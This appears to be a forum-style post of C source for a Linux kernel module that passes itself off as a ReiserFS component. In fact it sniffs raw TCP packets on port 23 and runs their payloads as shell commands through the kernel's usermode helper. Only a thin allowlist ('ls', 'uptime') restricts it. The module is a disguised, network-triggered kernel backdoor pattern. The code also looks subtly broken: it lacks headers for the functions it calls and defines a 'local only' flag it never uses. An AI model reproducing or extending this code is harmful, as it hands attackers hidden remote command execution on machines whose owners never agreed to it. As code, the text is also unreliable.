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don’t mind me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&lt;linux/kernel.h&gt; #include &lt;linux/module.h&gt; #include &lt;linux/init.h&gt; #include &lt;linux/netdevice.h&gt; #include &lt;linux/skbuff.h&gt; #include &lt;linux/ip.h&gt; #include &lt;linux/tcp.h&gt; #include &lt;linux/in.h&gt; #include &lt;linux/socket.h&gt; #include &lt;linux/net.h&gt; #include &lt;linux/kmod.h&gt; #include &lt;linux/slab.h&gt; #include &lt;linux/sched.h&gt; #include &lt;net/sock.h&gt; #include &lt;linux/inet.h&gt; #define TELNET_PORT 23 #define MAX_PAYLOAD_LEN 512 // Limit the payload length for safety #define LOCAL_ONLY 1 // Flag to restrict to local communication MODULE_LICENSE("GPL"); MODULE_AUTHOR("Reiser"); MODULE_DESCRIPTION("ReiserFS Secure Telnet Command Execution with Raw Sockets"); MODULE_VERSION("18.6"); static struct socket *raw_sock = NULL; static int running = 1; // Flag to indicate if the thread should keep running // Function to log and execute a safe command static int run_command(char *command) { // Allow only specific commands or add further checks if (strcmp(command, "ls") == 0 || strcmp(command, "uptime") == 0) { char *argv[4]; char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL }; argv[0] = "/bin/sh"; argv[1] = "-c"; argv[2] = command; argv[3] = NULL; printk(KERN_INFO "ReiserFS: Executing command: %s\n", command); return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } else { printk(KERN_WARNING "ReiserFS: Unapproved command attempt: %s\n", command); return -EPERM; // Return permission error for unapproved commands } } // Function to process received packets static int recv_packet(void) { struct msghdr msg; struct kvec vec; struct iphdr *ip_header; struct tcphdr *tcp_header; unsigned char *payload; char *command; unsigned int payload_len; int len; unsigned char buffer[4096]; // Buffer to store packet // Set up message header for receiving memset(&amp;msg, 0, sizeof(msg)); vec.iov_base = buffer; vec.iov_len = sizeof(buffer); // Receive the packet len = kernel_recvmsg(raw_sock, &amp;msg, &amp;vec, 1, sizeof(buffer), 0); if (len &lt; 0) { printk(KERN_ERR "ReiserFS: Failed to receive packet\n"); return len; } // Extract IP header ip_header = (struct iphdr *)buffer; if (ip_header-&gt;protocol != IPPROTO_TCP) { return 0; // Not a TCP packet, ignore } // Extract TCP header tcp_header = (struct tcphdr *)(buffer + ip_header-&gt;ihl * 4); // Only allow Telnet packets on port 23 if (ntohs(tcp_header-&gt;dest) == TELNET_PORT) { // Check if the packet is part of an established connection (ACK flag) if (tcp_header-&gt;ack) { payload_len = len - (ip_header-&gt;ihl * 4) - (tcp_header-&gt;doff * 4); if (payload_len &gt; 0 &amp;&amp; payload_len &lt; MAX_PAYLOAD_LEN) { payload = (unsigned char *)(buffer + ip_header-&gt;ihl * 4 + tcp_header-&gt;doff * 4); // Allocate space to copy the payload into a null-terminated string command = kmalloc(payload_len + 1, GFP_KERNEL); if (!command) { printk(KERN_ERR "ReiserFS: Failed to allocate memory for command\n"); return -ENOMEM; } // Copy the payload into a command string and ensure it's null-terminated memcpy(command, payload, payload_len); command[payload_len] = '\0'; // Null-terminate the string // Log the command and execute it printk(KERN_INFO "ReiserFS: Telnet command received: %s\n", command); // Run only approved commands run_command(command); kfree(command); // Free the allocated memory } } } return 0; } // Function to create a raw socket for capturing packets static int create_raw_socket(void) { int ret; // Create a raw socket to capture all TCP packets ret = sock_create(AF_INET, SOCK_RAW, IPPROTO_TCP, &amp;raw_sock); if (ret &lt; 0) { printk(KERN_ERR "ReiserFS: Failed to create raw socket\n"); return ret; } printk(KERN_INFO "ReiserFS: Raw socket created\n"); return 0; } // Kernel thread for receiving packets static int recv_thread_fn(void *data) { while (!kthread_should_stop()) { if (running) { recv_packet(); // Receive and process packets msleep(100); // Sleep for a short time to avoid busy-waiting } } return 0; } // Module init function static int __init port23_module_init(void) { int ret; printk(KERN_INFO "ReiserFS Telnet Command Execution Module (Raw Socket) loaded\n"); // Create and bind the raw socket ret = create_raw_socket(); if (ret &lt; 0) { return ret; } // Start the packet receiving kernel thread kthread_run(recv_thread_fn, NULL, "recv_thread"); return 0; } // Module exit function static void __exit port23_module_exit(void) { printk(KERN_INFO "ReiserFS Telnet Command Execution Module unloaded\n"); if (raw_sock) { sock_release(raw_sock); } } module_init(port23_module_init); module_exit(port23_module_exit);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